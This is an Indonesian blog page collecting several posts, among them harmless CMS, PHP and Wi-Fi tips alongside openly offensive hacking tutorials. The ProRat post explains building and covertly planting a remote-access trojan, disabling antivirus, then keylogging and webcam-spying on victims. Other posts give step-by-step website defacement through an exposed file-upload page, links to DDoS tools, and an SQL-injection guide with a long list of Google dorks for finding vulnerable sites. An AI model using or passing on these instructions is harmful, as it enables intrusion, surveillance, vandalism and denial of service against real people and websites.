Rabu, 17 April 2013

Download CMS Gratis (0)









08.40 by Fery's Profile, under cms, download, drupal, geeklog, joomla, mambo, oscommerce, php fusion, phpbb, phpcoin, smf, wordpress

Content Management System (CMS) adalah software sistem manajemen konten yang diimplementasikan dalam bentuk aplikasi web, digunakan untuk membuat dan mengelola konten HTML. Aplikasi ini dipakai untuk mengelola dan mengatur material web (dokumen HTML dan gambar yang terkait) yang dinamis dalam jumlah besar. CMS memfasilitasi pembuatan dan pengaturan konten, pengeditan, dan banyak fungsi esensial dari pemeliharaan web.
1. Joomla
Joomla adalah Content Management System (CMS) yang Open Source dan ditulis menggunakan PHP dan basisdata MySQL untuk keperluan di internet maupun intranet.
Joomla pertama kali dirilis dengan versi 1.0.0.
Fitur-fitur Joomla diantaranya adalah sistem caching untuk peningkatan performansi, RSS, blogs, poling, dll.
Joomla menggunakan lisensi GPL.

2. WordPress
WordPress adalah sebuah perangkat lunak blog yang ditulis dalam PHP dan mendukung sistem basis data MySQL.
WordPress adalah penerus resmi dari b2
cafelog yang dikembangkan oleh Michel Valdrighi.
Nama WordPress diusulkan oleh Christine Selleck, teman dari ketua developer, Matt Mullenweg.
WordPress didistribusikan dengan lisensi GNU General Public License.

3. Mambo
Mambo adalah sebuah Sistem Manajemen Konten (Content Management System, CMS) open source yang digunakan untuk menciptakan dan mengelola situs web dari yang paling sederhana sampai aplikasi perusahaan yang paling kompleks sekalipun.
Mambo dikenal mudah untuk diinstal, gampang dikelola dan memiliki kapabilitas yang tinggi.

4.
Drupal
Drupal adalah sebuah perangkat lunak sistem manajemen konten yang bebas dan terbuka yang di distribusikan dibawah lisensi GPL.
Drupal dapat diunduh secara bebas dan dapat digunakan secara bebas juga.
Drupal dapat digunakan untuk membangun:
* Portal Web Komunitas
* Situs Diskusi
* Website Perusahaan
* Aplikasi Internal
* Website Personal atau Blog
* Aplikasi Komersial E-Commerce
* Kumpulan Sumber Informasi
* Situs Jaringan Sosial
* Website Multi Bahasa
* Dan lain-lain

5. PhpBB
PhpBB merupakan Content Management System (CMS) untuk forum internet yang ditulis dengan bahasa pemrograman PHP.
Nama “phpBB” merupakan singkatan dari PHP Bulletin Board dan tersedia dalam GNU General Public Licence sehingga didistribusikan sebagai freeware.

6. Geeklog
Geeklog adalah Content Management System (CMS) weblog yang memungkinkan user menciptakan situs dinamis.
Geeklog juga dilengkapi fitur registrasi pengunjung, memposting jurnal dan memberikan komentar.
Para user juga dapat memilih tampilan dari situs.

7. PHP-Fusion
PHP-Fusion adalah sebuah sistem manajemen berbasis konten, yang menggunakan MySQL database untuk menyimpan konten website, dan memiliki sistem administrasi sederhana.

8. Simple Machines Forum (SMF)
SMF adalah perangkat profesional yang memungkinkan pengguna untuk membuat komunitas online dengan cepat dan mudah.

9. MediaWiki
MediaWiki adalah sebuah paket perangkat lunak wiki yang menggunakan lisensi GNU General Public License.
MediaWiki merupakan perangkat lunak yang dibuat secara khusus untuk Wikipedia dan proyek-proyek lainnya dari Yayasan Wikimedia, tetapi sekarang ini sudah digunakan secara luas.

10. PHP Nuke
PHP Nuke adalah salah satu aplikasi template untuk pembuatan website dinamis menggunakan basis bahasa PHP.
Proses pembuatan PHP Nuke sangat mudah yaitu cukup mengikuti wizard-wizard yang telah disediakan.
Komponen-komponen templatenya juga sangat beragam, mulai dari modul FAQ, forum, poling, multiple polling, counter, guestbook dan lain sebagainya.

11. osCommerce
osCommerce adalah sebuah multi-fungsi dan multi-bahasa open source solusi e-commerce, yang memungkinkan pengguna untuk membuat toko online dengan cepat dan mudah.
Tidak diperlukan keterampilan khusus untuk menangani proses set-up yang sangat mudah dan mengelola toko online Anda semua layanan dan fitur.

12. phpCOIN
phpCOIN adalah aplikasi komprehensif penagihan / faktur , ideal untuk web hosting reseller untuk mengatur pelanggan pesanan, faktur, dan catatan helpdesk.
Hal ini dapat juga digunakan oleh berbagai jenis usaha dalam bidang lain.


]

Download Hacking Tools Prorat dan Tutorial



Download Hacking Tools Prorat dan Tutorial






Kali ini mari kita bermain dengan salah satu tools hacking,yaitu prorat.


Tools buatan orang Turkey ini sangat luar biasa, tools ini berfungsi untuk menyusup ke komputer orang lain. Caranya sangat gampang dan mudah sekali, tinggal kita mengetahui IP dan Port komputer korban, maka kita dapat langsung menginfeksinya.


A. Cara penggunaan ProRat


1. Pertama kali kita harus mengetahui terlebih dahulu IP dan Port korban yang terbuka. Kita dapat melakukannya dengan cara manual atau juga dengan bantuan Ports Scanner.




Dari gambar diatas kita mengetahui semua IP komputer yang aktif dan Port mana saja yang terbuka. Yang akan dijadikan korban pada percobaan kita kali ini adalah komputer dengan IP 192.162.10.233.


2. Langkah selanjutnya yaitu kita jalankan ProRat, tools ini dapat di download di http://www.prorat.net . Sebelumnya matiin dulu Anti Virus kamu (disable), karena ProRat akan terdeteksi sebagai virus. Padahal dia tidak berbahaya bagi komputer kita. Setelah itu isikan IP korban pada form IP dan Portnya (default 5110).




Apabila kita klik tombol Connect maka koneksi ke komputer korban belum bisa, karena komputer korban belum kita infeksi. Untuk menginfeksi komputer korban kita terlebih dahulu membuat server yang akan dijalankan pada komputer korban. Caranya klik tombol Create – Create Prorat Server. Lalu muncul tampilan Notifications :




Centang pilihan Use Proconnective Notifications dan isi IP(DNS)Address dengan IP kita. Pada tab General Setting kita isikan Server Port (default 5110), Server Password dan Victim Name.




Pada tab Bind with File kita dapat menyusupkan file yang akan dijalankan bersama Server. Extensi file bebas.




Selanjutnya adalah tab Server Extension, ada beberapa pilihan extensi server. Kita pilih yang berekstensi .Exe.




Untuk membuat icon server kita klik tab Server Icon, pilih icon apa saja yang kamu inginkan.




Langkah terakhir dari pembuatan server ini adalah klik Create Server.




Setelah berhasil, akan tampil :




3. Kita tinggal menjalankan Server tersebut dikomputer korban. Caranya terserah kamu… mau disusupkan diam-diam atau memakai teknik Social Engineering dan juga dapat kamu infeksikan langsung pada komputer tersebut (kalo bias sihh).


4. Setelah Server tersebut berhasil berjalan pada komputer korban, maka kita langsung mencoba mengkoneksikannya dengan komputer kita.


5. Untuk koneksi kita dapat menggunakan ProConnective atau langsung mengetikkan IP address dan Port komputer korban. ProConnective adalah tools bawaan dari ProRat yang berfungsi sebagai Bridge (jembatan koneksi) antara komputer server dan komputer client (korban). Akan nampak IP korban apabila dia sedang on.




6. Setelah berhasil melakukan koneksi ke komputer korban maka status dari ProRat akan berubah dari Disconnected ke Connected




7. Nah…saatnya kita bermain. Ada banyak hal yang dapat kita lakukan pada komputer korban seperti mengetahui informasi dari PC, mengirimkan pesan error, mematikan komputer, mengunci mouse, membuka CD-ROM atau bahkan memotret wajah korban .


8. Sekarang kita akan melihat PC info korban :




Dari gambar diatas kita dapat melihat informasi yang dimiliki dari komputer korban.


9. Kita juga dapat mengirimkan pesan error palsu ke komputer korban :




10. Memasang Keylogger.




11. Dan yang paling seru adalah melihat wajah dari korban yang kita hack.




Bagaimana seru kan? Itu masih sebagian kecil dari kegunaan ProRat masih banyak lagi fungsi lainnya, seperti memformat hardisk milik korban, mengacaukan registry, mencuri data-data penting dan lain sebagainya. Akan tetapi, dalam pembahasan kita kali ini kita cukupkan sekian saja ya. Ok !


Gunakan dengan baik ya…


B. Cara Pencegahan


1. Update selalu Anti Virus anda agar mampu mendeteksi adanya infeksi dari ProRat. Biasanya server ProRat terdeteksi sebagai
Trojan.Dropper.Prorat.DZ.29, Dropped:Backdoor.Prorat.DZ.
2. Pasanglah Anti Prorat, anda bisa mendownloadnya di
www.softpedia.com/get/Antivirus/Anti-prorat.shtml.


Selamat mencoba…




NB: Makasih buat om Muhammad Fikri Hidayatullah yg sudah berikan ilmunya

Membuat Sendiri Script PHP Menampilkan Artikel Terkait


Membuat Sendiri Script PHP Menampilkan Artikel Terkait


 

Apakah Anda sedang belajar membuat script CMS sendiri? Jika ya,
rasanya belum lengkap deh tanpa fitur yang menampilkan daftar artikel
yang terkait dengan sebuah artikel yang sedang dibaca oleh pengunjung
blog. Dengan adanya fitur ini, pengunjung akan diarahkan ke artikel
lain yang masih berhubungan dengan artikel yang sedang dibacanya
sehingga bisa menambah wawasan lebih bagi mereka. Sedangkan efek
positif bagi Anda sebagai pemilik situs adalah meningkatnya impression
atau page view situs Anda, dan juga membuat visitor lebih tahan
berlama-lama untuk menjelajahi situs Anda. Apabila Anda menggunakan
WordPress atau blogging software yang lain, maka fitur untuk
menampilkian artikel terkait ini bisa langsung ditanam menggunakan
plugin yang disediakan, misalnya YARPP. Namun, bagi Anda yang membuat
CMS sendiri tentunya hal ini menjadi tantangan tersendiri. Oleh karena
itu dalam artikel ini, saya akan mencoba memaparkan ide untuk membuat
modul script yang menampilkan artikel terkait dengan PHP.


Misalkan kita mempunyai CMS dengan struktur tabel database untuk
menyimpan data artikel seperti di bawah ini:
view sourceprint?
1.CREATE TABLE `artikel` (
2.`id` int(11) AUTO_INCREMENT,
3.`judul` varchar(100),
4.`konten` text,
5.`tanggal` date,
6.PRIMARY KEY (`id`)
7.);

dan andaikan kita sudah memiliki data artikel sbb: Selanjutnya, kita
buat script untuk menampilkan detail isi artikelnya berdasarkan id
artikel nya. artikel.php
view sourceprint?
01.<?php
02.// koneksi ke database
03.mysql_connect('localhost', 'username', 'password');
04.mysql_select_db('database');
05.
06.// membaca id artikel
07.$idartikel = abs((int) $_GET['id']);
08.
09.// membaca data detail artikel berdasarkan id artikel
10.$query = "SELECT * FROM artikel WHERE id = '$idartikel'";
11.$hasil = mysql_query($query);
12.$data  = mysql_fetch_array($hasil);
13.?>
14.
15.<html>
16.<head>
17.<title><?php echo $data['judul']?></title>
18.</head>
19.<body>
20.<h1><?php echo $data['judul']?></h1>

21.<small><em>Tanggal publikasi: <?php echo
$data['tanggal']?></em></small>
22.
23.<div>
24.<?php echo $data['konten']?>
25.</div>
26.
27.<div>
28.<h3>Artikel Terkait</h3>
29.<?php
30.include "function.php";
31.artikelTerkait($idartikel);
32.?>
33.</div>
34.</body>
35.</html>

Script di atas digunakan untuk menampilkan konten dari sebuah
artikel berdasarkan id artikelnya, dimana untuk menampilkan konten
suatu artikel menggunakan URL http://namahost/artikel.php?id=…
Perhatikan perintah
view sourceprint?
1.$idartikel = abs((int) $_GET['id']);

perintah tersebut digunakan untuk mencegah SQL injection melalui GET
method sebagaimana yang dulu pernah saya tulis artikelnya. Jika kita
perhatikan dari script di atas, maka di bawah isi artikelnya ada bagian
sbb:
view sourceprint?
1.<div>
2.<h3>Artikel Terkait</h3>
3.<?php
4.include "function.php";
5.artikelTerkait($idartikel);
6.?>
7.</div>

Bagian tersebut digunakan untuk menampilkan daftar artikel yang
terkait dengan artikel yang sedang dibaca. Untuk menampilkan daftar
artikel yang terkait dengan artikel ber ID $idartikel, saya menggunakan
sebuah function dengan nama artikelTerkait($idartikel) dimana
$idartikel adalah parameternya. Function ini saya letakkan di file
function.php yang terpisah dari script artikel.php. Kalaupun Anda
meletakkan functionnya dalam file yg sama dengan artikel.php juga
tidak ada masalah Selanjutnya kita tinjau apa isi dari function
artikelTerkait(). Dalam contoh ini, keterkaitan artikel yang dimaksud
di sini ditinjau dari kemiripan judul artikelnya. Adapun idenya
adalah, kita baca semua judul artikel yang ada dalam database kecuali
artikel yang menjadi acuan (artikel ber ID $idartikel). Selanjutnya
untuk semua judul artikel ini, kita lihat kemiripannya dengan judul
dari artikel yang ber ID $idartikel ini. Kita bisa melihat kemiripan
dari judul artikel ini menggunakan function similar_text() yang pernah
saya bahas di artikel lain tentang uji kemiripan teks. Kemudian,
karena hasil dari penggunakan similar_text() ini berupa angka dalam
bentuk prosentase kemiripan, maka sebaiknya kita membuat semacam batas
minimal prosentase atau threshold, yang nantinya digunakan untuk
memberi batas minimal kemiripannya. Sebagai contoh misalkan daftar
artikel terkait yang ditampilkan hanya artikel yang memiliki tingkat
kemiripan 50% ke atas. Hal ini berfungsi untuk memfilter mana artikel
yang benar-benar mirip atau tidak. Artikel yang jauh dari mirip, akan
memiliki prosentase kemiripan kecil. Tapi besar kecilnya threshold ini
sepenuhnya terserah Anda, karena Andalah yang menentukan. Hal yang
menjadi pemikiran berikutnya adalah, bagaimana jika jumlah artikel
yang terkait itu ada banyak, misalkan ada 100 buah? tentunya tidak
mungkin kita tampilkan semua karena halaman page artikelnya bisa jadi
penuh dengan judul-judul artikel sehingga tidak menarik bagi
pengunjung. Oleh karena itu kita sebaiknya batasi jumlah artikel
terkaitnya. Untuk mengimplementasikan hal ini, setiap judul artikel yang
kemiripannya di atas threshold, maka kita simpan ke dalam sebuah
array. Selama jumlah artikel dalam array tersebut belum memenuhi batas
maksimum jumlah artikel nya, maka judul-judul terkait itu bisa
ditambahkan dalam array. Setelah proses ini selesai, barulah kita
tampilkan list judul artikel terkaitnya yang ada dalam array tersebut.
Nah… dari ide di atas, kita bisa membuat scriptnya sbb: function.php
view sourceprint?
01.<?php
02.
03.// koneksi ke database
04.mysql_connect('localhost', 'username', 'password');
05.mysql_select_db('database');
06.
07.function artikelTerkait($id)
08.{
09.// batas threshold 40%
10.$threshold = 40;
11.// jumlah maksimum artikel terkait yg ditampilkan 3 buah
12.$maksArtikel = 3;
13.
14.// array yang nantinya diisi judul artikel terkait
15.$listArtikel = Array();
16.
17.// membaca judul artikel dari ID tertentu (ID artikel acuan)

18.// judul ini nanti akan dicek kemiripannya dengan artikel yang
lain
19.$query = "SELECT judul FROM artikel WHERE id = '$id'";
20.$hasil = mysql_query($query);
21.$data  = mysql_fetch_array($hasil);
22.$judul = $data['judul'];
23.
24.// membaca semua data artikel selain ID artikel acuan
25.$query = "SELECT id, judul FROM artikel WHERE id <> '$id'";
26.$hasil = mysql_query($query);
27.while ($data = mysql_fetch_array($hasil))
28.{

29.// cek similaritas judul artikel acuan dengan judul artikel
lainnya
30.similar_text($judul, $data['judul'], $percent);
31.if ($percent >= $threshold)
32.{
33.// jika prosentase kemiripan judul di atas threshold
34.if (count($listArtikel) <= $maksArtikel)
35.{

36.// jika jumlah artikel belum sampai batas maksimum, tambahkan ke
dalam array

37.$listArtikel[] = "<li><a
href='artikel.php?id=".$data['id']."'>".$data['judul']."</a></li>";
38.}
39.}
40.}
41.
42.// jika array listartikel tidak kosong, tampilkan listnya
43.// jika kosong, maka tampilkan 'tidak ada artikel terkait'
44.if (count($listArtikel) > 0)
45.{
46.echo "<ul>";
47.for ($i=0; $i<=count($listArtikel)-1; $i++)
48.{
49.echo $listArtikel[$i];
50.}
51.echo "</ul>";
52.}
53.else echo "<p>Tidak ada artikel terkait</p>";
54.}
55.?>
Mudah bukan membuatnya? Hasil dari script artikel.php?id=… jika dijalankan di browser adalah sebagai berikut: Nah… selanjutnya Anda bisa kembangkan sendiri script di atas, misalnya jika di dalam CMS Anda ada semacam kata kunci atau tag, maka artikel terkait bisa berdasarkan tag tersebut atau kategori artikel.

Deface dengan Teknik Remote File Upload Exploit Vulnerability



sekarang saya akan share cara deface website lagi sob. Tutorial ini saya dapat dari grup facebook Hacker Indonesia. Namun karena masih banyak yang bingung, disini saya akan jelaskan beserta gambarnya.


We Are Anonymous !

Ok, daripada lama-lama cerita, mending kita langsung aja ketutorialnya sob, Berikut Tutorial Deface dengan Teknik Remote File Upload Exploit Vulnerability :
Dork :
inurl:/editor/editor/filemanager/
inurl:/HTMLEditor/editor/"

1). Masukan salah satu dork diatas ke Seacrh Enginee Google.

2). Pilih salah satu website sebagai target.

3). Tampilan Webitenya nanti akan seperti ini.

4). Kemudian kode ini :
editor/editor/filemanager/browser/mcpuk/images/icons/32/

5). Ganti dengan kode ini, Lalu enter :
editor/editor/filemanager/upload/test.html

6). Jika sudah, kamu ubah pada Select the "File Uploader" to use: Ubah dari ASP menjadi PHP.

7). Kemudian kamu klik Choose File, kamu pilih salah satu file HTML deface'an kamu.

8). Lalu klik Send it to the Server.

9). Jika berhasil nanti akan muncul notice jika file yang kamu upload berhasil tanpa eror, dan pada kotak ( Upload File URL ) akan memberikan patch dimana file kamu berada.

10). Copykan saja file yang ada di ( Upload File URL ) lalu taruh dibelakang site target, jadi nanti akan terlihat seperti ini :

Screenshot :

Cara sama dengan dengan tutorial yang pernah saya share dulu yaitu Cara Deface Website Melalui Spaw Uploads Vulnerability, hanya saja sedikit berbeda tampilan ketika kita akan mengupload file HMTL.

Menambahkan Jam dan Kalender Pada Blog



 

Blog kita anggapkan saja sebagai rumah kita, yaitu tempat kita berteduh dari panasnya siang dan dinginnya malam. Blog tempat kita tinggal berada dalam suatu lingkungan yang cukup luas yang setiap orang bebas untuk datang ke rumah kita (blog). Adakalanya kita juga perlu unutk menghias rumah kita agar kelihatan lebih indah dan rapi.

Salah satu
pernak-pernik yang biasanya ada di rumah (blog) adalah  jam dan kalender, hidup ini terbatas oleh waktu, dan setiap rumah pasti punya jam atau kalender, walau jaman sekarang ada saja hal-hal yang mempermudah manusia, misalnya saja di HP  sudah ada jam  dan kalendernya.

Jam adalah sebuah unit waktu. Lama sebuah jam adalah 1/24 (satu perduapuluh empat) hari. Satu jam bisa dibagi menjadi unit waktu yang lebih kecil lagi. Satu jam terdiri dari: 60 menit atau 3600 detik
Cara Menambahkan Jam dan Kalender Pada Blog
  1. Login ke blogger
  2. Pilih Tata Letak kemudian Tambah Gadget
  3. Pilih HTML/JavaScript
  4. Masukan kode-kode berikut ini
<script src="http://www.clocklink.com/embed.js"></script><script language="JavaScript" type="text/javascript">obj=new Object;obj.clockfile="5015-green.swf";obj.TimeZone="GMT0700";obj.width=160;obj.height=40;obj.wmode="transparent";showClock(obj);</script>

Hasilnya kan seperti ini



Dan atau yang satu ini
<center><iframe src="http://www.free-blog-content.com/Calendars/calendar0054.htm" width="120" height="150"
marginwidth="0" marginheight="0" frameborder="no" scrolling=no allowtransparency="true"></iframe></center>

Hasilnya akan seperti ini


Sebuah kalender adalah sebuah sistem untuk memberi nama pada sebuah periode waktu (seperti hari sebagai contohnya). Nama-nama ini dikenal sebagai tanggal kalender. Tanggal ini bisa didasakan dari gerakan-gerakan benda angkasa seperti matahari dan bulan.

Dengan pernak-pernik hiasan rumah (blog) mungkin akan bisa meperindah blog kita, sehingga orang-orang akan semakin betah bertamu ke blog kita. Untuk lebih banyak pilihan jam kita bisa ambil dari
sini, dan untuk lebih banayak pilihan kalender kita bisa ambil dari sin

10 Cara Meningkatkan Kemampuan Wireless

Jika kita adalah seorang administrator jaringan, tentu tidak asing lagi mendengar Wireless Network. Bila kita ingin memaksimalkan penggunaan jaringan wireless di lingkungan kerja atau sekolah, ada beberapa tips yang mungkin bisa menjadi pedoman untuk memaksimal Jaringan wireless kita.


(1) Posisikan wireless router (atau wireless access point) di tengah lokasi

Seharusnya kita meletakan wireless router pada tengah-tengah area atau ruangan yang ingin kita jangkau. Jika tidak memungkinkan, berarti kita harus meletakkannya di area yang terbuka, nantinya kita akan menambah peralatan lain untuk menguatkan sinyal dari wireless router.


(2) Jauhkan Wireless router dari bahan yang mengandung metal dan tinggikan dari lantai atau dinding.

Metal, dinding, dan lantai dapat menggangu sinyal wireless router kita. Usahakan peralatan kita tidak berdekatan dengan benda diatas. dengan berdekatan dgn benda tersebut akan melemahkan sinyal dari Wireless Router dan menggangu penerimaan pada Laptop atau perangkai lainnya.

(3) Gunakan Antena Wireless yang tepat.

Gunakanlah antena bawaan dari perangkat tersebut. Karena antena default dari wireless router sudah di design omni-directional, artinya sinyal dipancarkan ke segala arah. Tetapi jika kita ingin mengarahkan sinyal ke satu arah maka gunakanlah antena hi-gain atau antena arahan.

(4) Tukar wireless network adapter pada Komputer.

Prinsip Wireless network signals yang baik adalah dapat mengirim dan menerima sinyal ke komputer dan sebaliknya. Kadang perangkat wireless di Komputer kita tidak melakukan hal ini dengan baik, karena mungkin menggunakan tipe Hi-Gain antena, sehingga sinyal tidak dibalikan ke arah yang benar. Jika kita sudah menggunakan jenis yang tepat, berarti tidak perlu lagi melakukannya.

(5) Tambahkan wireless repeater.

Wireless repeaters digunakan untuk menambah jangkauan jarak dari dari sinyal yang dihasilkan oleh wireless router tanpa harus menambahkan kabel. Jika kita memiliki area yang cukup luas, sebaiknya ditambah dengan repeater. Salah satu produk dari wireless repeater adalah ViewSonic, D-Link, Linksys, dan Buffalo Technology.
(6) Pilih channel yang tepat untuk wireless router.

Sinyal yang dihasilkan oleh perangkat wireless kadang bisa diganggu atau adanya interferen dari perangkat Radio Amatir dan sejenisnya. Channel yang umum digunakan adalah 1, 6, dan 11. Ubahlah perangkat ke channel tersebut. Kita tidak perlu lagi mengubah konfigurasi pada perangkat yang tersambung di PC atau Laptop, karena secara otomatis akan terdeteksi.

(7) Mengurangi interferensi Sinyal Wireless.

Jika disekitar kita banyak menggunakan cordless phones atau perangkat elektronik lain yang menggunakan sinyal juga, makanya pastikan bahwa perangkat wireless kita berjalan di frekuensi 2.4GHz. Biasanya cordless phones menggunakan frekuensi 5.8GHz atau 900MHz.

(8) Update your firmware or your network adapter driver.

Lakukan update secara teratur Firmware dari Wireless Router yang anda gunakan. Cara dan info terbaru untuk melakukan update dapat mengunjungi Web site pembuat perangkat.

(9) Gunakanlah perangkat dari satu vendor.

Kadang kala Linksys router dapat bekerja dengan D-Link network adapter, tetapi belum tentu menghasilkan hasil yang sangat optimal. Makanya lebih baik kita menggunakan perangkat yang satu merk.

(10) Upgrade 802.11b devices ke 802.11g.

Bukan memaksakan, tapi lakukanlah upgrade perangkat yang lama dari jenis 802.11b ke jenis terbaru seperti 802.11g. Karena dengan menggunakan versi terbaru menghasilkan kecepatan yang lebih tinggi. Secara teori jenis 802.11b memiliki daya transfer 2-5Mbps sedangkan 802.11g mencapai 13-23Mbps. Bahkan Belkin’s akan mengeluarkan peralatan yang mendukung 37-42Mbps. 

DDOS Attack Tools





Tools :XerXes STRONG DDoSser :http://pastebin.com/aWZMbjSU





TOOL PACK: any password requests: 123123http://www.mediafire.com/?syx7ad1yot8n3

Ddos tools -| LOIC |- download from here :http://sourceforge.net/projects/loic/files/latest/download


Anonymous



LOIC tutorial (bila masih kurang tahu) :http://www.youtube.com/watch?v=sQRu-J3f_Kw



Online HOIC (Change threads to 1,000 and enter URL)http://pastehtml.com/view/blclqdm91.html

[ Denial-of-service attack & Deface Programs ]http://www.mediafire.com/?3j9lp4avc1tjplt

[ Cyber Ghost VPN Program ]http://cyberghostvpn.com/

[ Free Emails To Use VPN ]http://pastebin.com/G9yQhHmg







Sql injection dengan hackbar


[ by : X Software Engineering 1] Page 1
Sql injection dengan hackbar
Apa itu SQL Injection ?
SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat meng insert perintah-perintah SQL melalui url untuk dieksekusi oleh database.
Penyebab utama dari celah ini adalah variable yang kurang di filter : id=$id;……. > Got Error
Hal pertama yang harus kamu lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter ‘ setelah / sesudah angka pada url
Contoh : http://situsq.com/berita.php?id=14’ http://situsq.com/berita.php?id=’14
Apabila terlihat pesan error seperti ini : You have an error in your SQL syntax.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1
Maka bisa dipastikan situs tersebut terdapat celah SQL Injection…
[ by : X Software Engineering 1 ] Page 2
Sedang kan Apa itu hackbar?
Hackbar adalah sebuah addons browser Firefox yang fungsinya cukup bnyak.. saya bikin postingan ini karena sekarang lagi sering pake addons ini, khususnya untuk programing web..
Hackbar ini sebenarnya berfungsi untuk menguji sistem kita misalnya dari sql injection.. atau XSS attack.. atau mengenkripsi password md5 ataupun SHA-1
Hackbar bias di dapat disini:
https://addons.mozilla.org/id/firefox/addon/hackbar/
Sekarang kita mulai SQL Injectionnya
Pertama yang kita lakukan adalah mencari web yang vuln SQLi ( ada bug sqlinjection ) dengan sebuah dork
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
[ by : X Software Engineering 1] Page 3
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
[ by : X Software Engineering 1 ] Page 4
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
[ by : X Software Engineering 1] Page 5
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
page.php?file=
newsDetail.php?id=
gallery.php?id=
article.php?id=
play_old.php?id=
show.php?id=
staff_id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
newsone.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
product-item.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
aboutbook.php?id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
[ by : X Software Engineering 1] Page 6
opinions.php?id=
spr.php?id=
pages.php?id=
announce.php?id=
clanek.php4?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
viewphoto.php?id=
article.php?id=
play_old.php?id=
declaration_more.php?decl_id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
Productinfo.php?id=
website.php?id=
Productinfo.php?id=
showimg.php?id=
view.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
[ by :X Software Engineering 1] Page 7
newsid=
trainers.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
iniziativa.php?in=
detail_new.php?id=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
rubp.php?idr=
offer.php?idf=
hotel.php?id=
art.php?idm=
title.php?id=
look.php?ID=
story.php?id=
labels.php?id=
review.php?id=
chappies.php?id=
news-full.php?id=
